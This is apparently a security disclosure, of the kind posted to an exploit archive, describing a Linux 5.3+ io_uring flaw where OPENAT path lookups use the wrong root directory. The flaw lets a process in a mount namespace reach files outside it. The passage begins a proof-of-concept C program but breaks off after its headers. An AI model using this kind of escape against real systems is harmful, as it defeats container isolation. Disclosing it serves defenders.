Linux versions 5.3 and above appear to have an issue where io_uring suffers from insecure handling of the root directory for path lookups.
cd4620f1e39d2b19219c64ba6facc1f3Linux >=5.3: io_uring: insecure handling of root directory for path lookups
When I saw
<https://lore.kernel.org/io-uring/[email protected]/T/>
today, I realized that this is not just a small correctness issue, but also has
some security implications on existing releases.
On 5.5, the incorrect handling of OPENAT means that not only the cwd, but also
the root directory is incorrect; here's a simple demonstration of how a process
inside a mount namespace can use that to gain access to the filesystem outside
the namespace:
===============================================================================
root@vm:~/uring# cat punted_open.c
#define _GNU_SOURCE
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <err.h>
#include <fcntl.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include \"linux/io_uring.h\"
#ifndef SYS_io_uring_enter
#define SYS_io_uring_enter 426